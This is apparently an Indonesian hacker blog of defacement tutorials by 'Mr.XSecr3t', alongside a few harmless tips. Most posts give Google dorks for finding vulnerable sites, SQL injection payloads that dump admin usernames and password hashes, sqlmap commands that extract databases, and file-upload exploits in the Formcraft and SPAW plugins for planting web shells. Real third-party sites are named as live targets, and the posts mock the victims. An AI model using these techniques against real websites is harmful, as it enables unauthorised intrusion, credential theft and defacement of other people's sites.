Hello Defacer tercinta

mau sdkit berbagi nih ...
seringkali bkan kita sering buat blogspot blogger pribadi ? naaah.. itu yang jd pembahasan kita sekarang ..

Sekarang mau sdkit SHARE Tentang
BAGAIMANA DEFACE BLOG BLOGSPOT Orang Lain/Sendiri juga bisa :P klo orng lain minimal hrus tau Email dan pass googlenya :p mnding bkin Sendiri ~

Okee Langsung Ke TKP yak :D


1.Bahan Bahan :
  1.Mental
  2.Berdoa biar Sukses :p
  3.Yang pasti email dan password google :)

2. Kalau udah siap Nomer 1 diatas .. langsung step lanjut ...
kalau udah punya blog Sendiri enak bisa deface langsung ... namun kendalanya kalau mau deface blog sendiri harus BACKUP HTML Asli agar data2 dari website kita ga Rusak/hilang :)
cara backupnya ?? nanti di Postingan selanjutnya ane POST ..
kalau belum punya BLOGSPOT silahkan Register pakai email dan password google ente ke http://www.blogger.com/

3.kalau udah buat Blog ada tulisan buat Blog pkoknya disuruh ikuti langkah2nya ...
 kalau udah maka kita akan disuruh milih template blognya ...
pilih asal2an aja .. nama blog terserah mau apa yang penting bisa dipakai :p

4.setelah itu ke Dashbor ...
kalau sudah ke dashbor ..CARI FOOTER Disebelah kiri bernama TEPLATE klik TEPLATE ...
setelah itu Klik Edit HTML ...

5.sehabis itu ... scrool kebawah terus paling bawah ada bacaan "UBAH KE TEMPLATE AWAL/CLASSIC" klik itu .. lalu Klik lagi Gunakan Template Classic ...

6.sehabis itu scrool kebawah lagi .. ada Kolom semacam Edit HTML kan ? Nah Masukkan SCRIPT Deface Kalian Disitu :p

Setelah itu Save Teplate

7.Terakhir! BERDOA BIAR SUKSES!!! LANGSUNG KLIK LIHAT BLOG DI ATAS FOOTER DASHBOR :p
Kalau SUKSES Akan terlihat deh DEFACEan kita :p WKWKWKWK


Sukses?
SHARE KESINI ! :p

nih ane punya LIVE DEMO juga :P hasil Deface BLOGSPOT Hacker Tunisia :P

Check DISINI BRO :P


Okeee Sekian TUTORnya yak ..
Kurang Jelas ? COMENT AJA ditanggepin Nanti :p


Thank's Before

SALAM ANONYMOUS !!

Jangan Pernah Menyerah,Karen Menyerah Sama Saja Menyerahkan Kepasrahan pada Keputus Asaan* ~Mr.XSecr3t~

(TRIK) Bagaimana Cara Agar TERMINAL/CMD PC anda Seperti LINUX/Backtrack!

ello ...

Trik kali ini ...
Ane Pengen Share pulaaa ~
sekedar Educational broo ~

Soal
TRIK Bagiamana cara agar terminal/CMD PC ente Seperti linux/ubuntu/backtrack ...

Download Disini dlu > https://copy.com/zBSaLkFcm6t8Kk4X
setelah didownload buka console.exe nya 
setelah itu klik edit>settings(paling bawah)
ada tulisan appreance>more (ada disebelah kiri urutan nomer dua)

setelah itu pilih ALPHA trus klik okeeee
Sukses Terminal Ente jadi kya Backtrack/linux/ubuntung  


Sekian tutor dari ane ~

kalau yang belum ngerti coment aja ~


                    

Membuat Text menjadi Lebih Hidup

Mau Tulisan/font Word Ente Keren ???
terus bisa gerak gerak jugaa ??
ada Effectnya jugaa ?????
gampaaang sekarang mah ~

tutorial kali ini membahas seperti diatas

okee gausah basa basi
langsung aja yak ~


Masuk ke URL Sini Convert Dlu Text yang dari text biasa keMagic Text Keren ~
Kalau udah Copy Magic Textnya .

Setelah itu ..
Masuk ke SINI!
Pilih FONT mana yang ente sukaa ...
tinggal klik, gambarnya doang ...
Setelah itu masukkan Text yang tadi udah di convert ... pastekan saja ..
setelah itu atur saja mulai dar ukuran hingga panjang lebar
setelah itu klik create logo ~

dan succes membuat Text INDAH ~~


sekian tutor dari ane

kurang jelas ? SILAHKAN COMENT !!

Deface Forum Sederhana~

Hello pengunjung Setia blog tercinta ane...

karena Berhubung ane NGAKAK karena ada yang Melakukan DEFACE SEMACAM ini di forum suatu team hacker indo    
jadi Ane POST gimana caranya Deface Forum sederhana ini   

Okee ..
langsung ke TKP aja bung ...
Masukkan Dork Berikut untuk search target forum mana yang ingin di deface ..
dork :inurl:/forums.asp?iFor= (kembangkan lagi biar maksimal) tambahkan site:com dibelakang urlnya terserah mau com/co/id
setelah itu akan ada banyak target yang akan keluar ....
pilih salah satu target semisal URL target forum sebagai berikut :
http://www.coachgirl.com/forum/forums.asp?iFor=8&offset=58
maka kemungkinan VULN .. bukan berarti yang tidak ada angkanya ga VULN .. just Delete the number from, end of URL .. jadinya gni
http://www.coachgirl.com/forum/forums.asp?iFor=8&offset=
Lalu Setelah itu TAMBAHKAN EXPLOIT Sqlnya yakni :
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
jadinya URL akan menjadi seperti ini :
http://www.coachgirl.com/forum/forums.asp?iFor=8&offset=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Lalu Tekan ENTER!!
kalau vuln maka akan keluar Nama table Seperti table Nama pada umumnya 
yang bernamakan 10 TOPICS adalah Username admin
yang bernamakan DATE adalah passwordnya ...
disini kita mengidentifikasi bagaimana cara Loginnya ...
maka akan ada tulisan login diatas tables berikut 
yakni bentuknya seperti berikut :
HOME | Login | Register 
ada disamping kiri paling atas TABLE 

maka Login lah menggunakan salah satu username dan password dicoba 1 per 1 
jika ada bacaan http erorr 404.0 not found artinya kita tidak bisa mengakses forum tersebut karena sudah dipatch ulang 
jikalau kita berhasil/SUKSES masuk ke admin panel ....
tinggal kita EKSEKUSI aja dah :P
caranya gimana ??
buat Topic baru/thread/berita terbaru ..
caranya Klik POST NEW TOPIC
lalu isi Subjectnya HACKED By BLABLABLAAAA ....
lalu isikan script Deface kalian di TOPICnya :P
walla!! Deface SUKSES !! Tinggal kita cari thread number dari URL yang kita buat tadi dimana :P
atau kalau ingin menutup seluruh Thread tinggal copykan aja script Berikut :

Hacked By Mr.XSecr3t

Mr.XSecr3t Ft Mr.Shlalom

Wkwkwkwk

Kode diatas bisa diubah sesuai keinginan Kalian
Trus klik tombol post...
Ok, HTML deface'an kalian udah masuk... sekarang klik judul postingan yang sobat tulis di subject tadi.

DEFACE SUKSES BUNG!! 


Sekian TUTOR dari Ane....

NITIP NAMA YAK jangan lupa :P
mau copas artikel ini ?SERTAKAN SUMBER 

thank's before for admin !    
Example :
see My Picture 

Note: karena Deface macam ini sudah banyak digunakan ditambah target yang mulai sedikit ...

mungkin agak sedikit usaha demi menghilangkan RASA PENSARAN Kalian yak :P

Mr.XSecr3t :troll:

Deface Dengan FbConnect Injection Vulnerability

Hello ...Pengunjung Setia Ane ...
mau Berbagi ILMU nih ... 

berhubung lagi mau berbagi ..
langsung aja deh yaa disimak tutorialnya :P
pada dasarnya tutorial ini sama layaknya seperti SQL Manual
namun beda nya ini menggunakan Kelemahan BUG Profile Facebook Pengunjung!

LANGSUNG DISIMAK AJA DEH YAA !!!
KE TKP

1.Dork :
inurl:"fbconnect_action=myhome"  (kembangin lagi .. tambahin site:com/terserah situ maunya negara mana)
maka akan muncul tampilan banyak tuh ... yang dibelakang URL websitenya ada link sama kya dork :P (?fbconnect blablabla)
langsung klik aja ...
kalau VULN akan Seperti ini :
liat GAMBAR

kalau udah kya gitu 

EXPLOIT Dengan ini :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)
z0mbyak,7,8,9,10,11,12+from+wp_users--
Kalau MUNCUL kya GAMBAR Dibawah ini

maka Kalian SUKSES!! tinggal Eksekusi saja yakni dengan Mengcrack Dah tuh password berbentuk MD5 :P

kalau udah sukses Di Decrypte tinggal LOGIN deh ke panel adminnya yakni di http://www.situstarget.com/wp-login.php :P

Dan Dicoba SUKSES!!!

okee sekian TUTOR dari ane nih ...
kurang jelas ?COMENT aja Nanti Di jawab :P

NITIP Nama Yak kalau sukses!! :P

COPAS?Sertakan Sumbernya  hargai karya orang lain bung


Mr.XSecr3t 

Deface WEBSITE Dengan Wordpress Via (Plugins Formcraft)

Seperti Janji ane ...
kali ini ane mau Share nihh
Yakni DEFACE DENGAN WORDPRESS! Via (Plugins Formcraft)
Buat berbagi ilmu untuk NEWBIE ...

Yuk Disimak Yak ..
ga usah basa basi deeh ...!

Siapkan bahan bahan dlu klau mau perang/latihan dimana mana butuh Bahan cuuy!  :P
yakni sebagai berikut :
     1.KOPI! biar ga ngantuk!
     2.CSRFnya (DOWNLOAD DISINI!)
     3.Pastinya Dork!!!!
yuk dah udah PRAKTEK langsung !!!

1.masukkan Dork berikut di pencarian google!
 inurl:/wp-content/plugins/formcraft (Kembangin lagi dorknya biar hasil maksimal! use your brain bro!)
setelah dimasukkan pasti banyak target keluar ... liat digambar !!!
hanya Situs yang ada wp-content/plugins/formcraftnya yg bsa dijadikan target (tidak semuanya bisa!)

2.setelah Sudah ada target silahkan masuk ke Situsnya
maka akan ada gambar seperti ini! lihat dibawah perhatikan URL juga yaa! kalau beda berarti beda! cari lagi

3.kalau udah gitu .. EXPLOIT dengan ini > file-upload/server/php

maka akan muncul gambar seperti ini!

lihat gambar!

4.lalu klik yang upload.php!

kalau VULN akan ada gambar seperti ini

kalau ga vuln hanya keluar Blank page atau juga bisa keluar apace server dengan upload.php versi didownload jadi ga bsa kalau gitu ... 

5.kalau udah dapet TARGET VULNnya langsung aja upload pake CSRF yg tadi ente Download!

masukkin URL Web beserta exploit tadi skalian ...

lalu save as dengan extensi html

buka deh csrfnya langsung upload shell ente :P

kalau sukses

langsung deh buka shellnya

shell acces :

localhost/wp-content/plugins/formcraft/file-upload/server/php/files/-namashellmu.php

dah gitu serah deh mau diapain :P tapi lebih baik sih jangan tebas indexnya ... kasian cape2 bikin tong lu tebas indexnya wkwkwk ! kalau mau di backup databasenya tinggal edit aj di shell index.php_backup :3 trus buat newfile index.php baru :v 

tralalalala~ langsung DEPES dah !

okeeee

sekian TUTOR dari ane yak ...

ketemu lagi nanti kalau lagi mood wowkowkokw :v 

JANGAN SEGAN SEGAN BERTANYA!
MALU BERTANYA SESAT DIJALAN!

Hai ..
ketemu lagi nih sama admin blog yang paling kece(mplung) :v

Bingung Mau Bikin Script Deface sendiri tanpa Copas" dari artikel orang ??
nih ..
DOWNLOAD aja DEFACE WEB CREATOR software pembuat script Deface!!!
mudah cepat ,,, cma butuh 3 menit !!

Caranya gimana??
DOWNLOAD DISINI!<~

Setelah itu extract file exenya ke folder C: okeee !!
stlh itu klik Deface web creator.exe nya 2x langsung deh buat sendiri :P
gampang ~


sekian artikel kali ini ....


JANGAN SEGAN SEGAN BERTANYA !!
MALU BERTANYA SESAT DIJALAN!

TEKHNIK DEFACE Dengan SQLMAP

hiii Pengunjung Setia Blog tercinta Aneee ...

kembali lagi nih dengan Ane wkwkwk

Seperti yang Ane Janjikan nih,Ane Mau Share Sdkit ilmu saja

yakni TEKHNIK DEFACE dengan SQLMAP

okedeh ... ga basa basi lagi nih yaa

biar ngerti ane kasih tutor Lengkap Dengan GAMBARNYA vrooh viar varokah :v 

Alat Alat Yang Perlu Di Siapin vrooh (yang pasti2 aje yee)

nihh alat2nya :

1.Sqlmap (kalau belum tau dimana downloadnya nih LINKnya)

2.Python 2.7.9 (Kalau ente blm punya juga nih Downloadnya DISINI)

3.Mechanize (Kalau blm punya jg ente ... mamposs aj dah wkwkwk....ga cma canda broo nih LINKnya)

4.biar ga tegang dan bingung mending sambil ngopi vrooh . jd asik dan cepat :P

okee Kalau alat2 dah siap tinggal PRAKTEK aja :P

Langkah 1 :

Gunakan DORK berikut :

inurl:/index.php?id='

inurl:/product.php?id='

inurl:/show.php?id='

NB : Tambahkan Domain Negara target semisal site: id/uk/us dibelakang dorknya :P

sisanya cari sendiri di mbah google kalau bsa sih di kembangin yak :P

Langkah 2

Ada Banyak Situs2 Target 

yang ente harus tau ... targetnya yang ada nomer dibelakangnya semisal index.php?id=32

liat gambar dibawah ini !!

Langkah Ke 3

Nah tinggal Klik Deh situs mna yang mau di sql tentunya ga semua situs looh bisa di sql :)

Kalau ente udah masuk ke situsnya ... cara mengetahui Situsnya VULN atau TIDAK VULN

gampang ...

tinggal tambahkan tanda string (') tanda petik dibelakang URL situsnya klau ada error semacam My Sql query/my sql affect expect parameter bolean givend in DSBnya itu berarti kemungkinan BESAR VULN !

liat gambar dibawah !

tapi kalau ga ada berarti ga vuln dan harus cari lagi ...

INGAT !! hanya situs yang ada IDnya /nomer dibelakang URL nya yang bisa dijadikan target !

Langkah ke 4

okee 

Ane Anggap Ente udah dapet tuh target tinggal Eksekusi saja !

Buka CMD !

pastinya ALAT2nya udah diextract blm ? 

kalau blm Extract dlu smuanya

Pythonnya INSTALL stlh di install (installnya di folder C yaa saran ane biar enak)

extract Sqlmap sama Mechanizenya kedalam python (hanya Data2nya doang bkn Zip/TARnya ...

okee kalau ente udah extract 

buka CMD !

truss ketik ini

cd C:/My Documents/Python27/mechanize

sebab karena C karena ane naruh Pytohn27nya di Folder Local disk C dan naruh di My Documents :P

Liat Di Gambar !

lalu kalau udah di folder mechanizenya 

setup.py install ! agar penginstalan mechanizenya untuk menjalankan SQL nya berjalan dengan lancar !

langkah ke 5

kembali ke situsnya

udah VULN kan ?

kalau udah eksekusi pakai ini

cd C:/My Documents/Python27/sqlmap

dan akn dipindahkan ke folder sql nanti

tinggal eksekusi

cd C:/My Documents/Python27/sqlmap.py -u http:///urltarget.co.uk/index.php?id=12 --dbs

arti --dbs adalah untuk memanggil database didalam situs tersebut

kalau udah tinggal tunggu selesai saja nanti klau ada perintah konfirmasi tekan (Y) aja trus

atau ada tulisan seperti ini "GET parameter "id" is vulnerable.do you want to keep testing the other 

itu tekan Y

liat gambar dibawah !

nanti databasenya akan muncul dengan sendiri

liat dibawah !

tinggal pilih deh database mana yang kira2 ada password dan username adminnya

kalau udah dapet kira2nya

ketik ini ulang lagi aja urlnya yang tadi

sqlmap.py -u http://urltargetente.index.php?id=13 -D(database yg ente pilih) --tables (memanggil tablenya) langsung enter! dan tunggu sebentar !

nah kalau udah ada tablesnya

tinggal pilih lagi kira2 dimana yaa username dan password adminnya

kalau udah ktmu

ketik lagi

sqlmap.py -u http://www.urltarget.co.uk/index.php?id=13 -D (database tadi) -T (tables yg ente pilih) --column (perintah untuk membuka Column)

lalu enter dan tunggu !!

nah

pasti keluar colom2 admin_user/admin_login * admin_pswd

nah eksekusi kembali lagi

ketik ini sqlmap.py -u http://www.urltargetente.co.uk/index.php?id=13 -D(database yg awal td prtma) -T (tables yg tadi kedua ente pilih) -C (column yg ente pilih klau 2 column ketik aj admin_user,admin_pw) lalu     --dump (perintah untuk mengeksekusi column terakhir)

dan TRALAAA !!

ketemu den admin user login dan passwordnya !

namun biasanya admin passwordnya biasanya berupa HASH jadi kamu harus Decrpyt dlu di md5 decrypt :)

liat gambar dibawah ! 

Kalau gitu mah tinggal gampang kelees!

cari admin page kalau udah HASH/Crack Admin PWnya :P

cari admin finder atau download Havij karena havij  ada tools admin Findernya :P

okeee

Sekian yaa Article dan pengetahuan yang Ane Kasih ke ente semua

Jangan Bosen Bosen Ke BLOG ane

belajar Sama Ane Dijamin Cepaat !! :P

HACKING IS NOT A CRIME

BUT

HACKING IS JUST ART !!

SALAM

ANONYMOUS INDONESIA

Mr.XSecr3t !!

JANGAN PERNAH BOSAN BERTANYA

KARENA MALU BERTANYA SESAT DIJALAN !!

DITUNGGU COMENTnya broo ! :p

TEKHNIK DEFACE Dengan SPAW UPLOAD VULNERABILITY

Hai Pengunjung setia blog ane yang tercinta !!
Kali ini mau Bagi Bagi Ilmu lagi nih
tentang Cara TEKHNIK DEFACE Dengan SPAW PLOAD VULNERABILITY
Pasti Penasaran kaaaannn hayooo ?? :v

oke deh daripada ente ente semua penasaran
langsung saja nih Ke TKP gan !!

1.Berdoa dulu oke? biar afdol dan varokaah :v
2.seperti biasa ! Siapin Script Defacean ente baik itu HTML/Txt/PHP serah ente aja mau gimana !
3.kalau udah siap script nya Langsung Cari Target Dengan Dork ini !  inurl/spaw2/upload/files/ site:id/uk/us serah ente contoh ane inurl/upload/files/site:uk
Ane Kasih live target deh 1 :v wkwkwk takut gabisa carinya ente !
nih LIVE TARGET sedot langsung depes! > http://crossdynamic.com/
kalau emng mau cari yg laen silahkan pake dorknya ~ kembangin sendiri vrooh !
4.kalau udah dapet targetnya ... silahkan Exploit aja dengan ini spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
5.Setelah itu tekan ENTER ! catatan : hanya diexploit yang spaw2/upload/filesnya jaa yaa ... yang lainnya jangan di exploit juga ! karna akan error !
setelah di ENTER maka Tampilan akan seperti ini !
Lihat Gambar Dibawah !!!

nah kalau sudah seperti ini

6.Ganti Dari IMAGE Ke Files !

seperti gambar diatas !

7.Setelah itu Pilih File Depesan Kalian ! html/txt/php terserah deh !

liat gambar dibawah !

nah ! kalau sudah dipilih

langkah terakhir

8. Klik UPLOAD ! dan tunggu prosesnya selesai !

Kalau sudah selesai maka akan ada FILE depesan kalian di File Managernya seperti gambar dibawah ini !

LIHAT DIBAWAH !

Nah Kalau udah gitu tinggal Download deh fiile Depesan kalian di pojok Kanan tengah ada kan tuh 

tulisannya download file !

Lihat GAMBAR DIBAWAH !

nah kalau udah kedownload maka akan KE REDIRECT sendiri File Downloadnya langsung deh Ada TAMPILAN DEFACE KALIAN SUKSES DEFACENYA !!!!

See Picture !

Nah kan WKWKWKW Sukses DEFACENYA :P

Kalau udah gini serah deh mau pamer2 kek apa kek atau bangga2 sendiri kek serah ente wokwowkokwok :v

Liat DEMO ane deh nih :v >  DEMO

okeeee !

SEKIAN TUTORIAL untuk Tekhnik Deface Dengan Spaw upload vulnerability !

Ingat ! Hacking bukanlah kejahatan tetapi adalah Seni karya* :p

Mr.XSecr3t

Anonymous Indonesia !

Salam Anonymous Indonesia !

SCRIPT DEFACE KEREN By Mr.XSecr3t !!

hallo Pengunjung Setia BLOG Tercinta Ane !!
mau bagi bagi niih script mayan laaah buat dicoba2 daripada ente bikin susah payah !
yang ini dijamin OKEEE :P

okee ! gausah basa basi lagi deh
nih Langsung Sedot aja SCRIPT Defacenya ! :p
Download Disini ! (cuma 30 detik paling !)
DOWNLOAD DISINI < script 1
DEMO Lihat Disini !   < demo 1

gambar script 1 diatas!

DOWNLOAD Disini   < script 2
DEMO Lihat Disini !   < Demo 2

Script ke 2 Diatas !

Script Deface Berjalan Ala Mr.XSecr3t

Download Disini Langsung !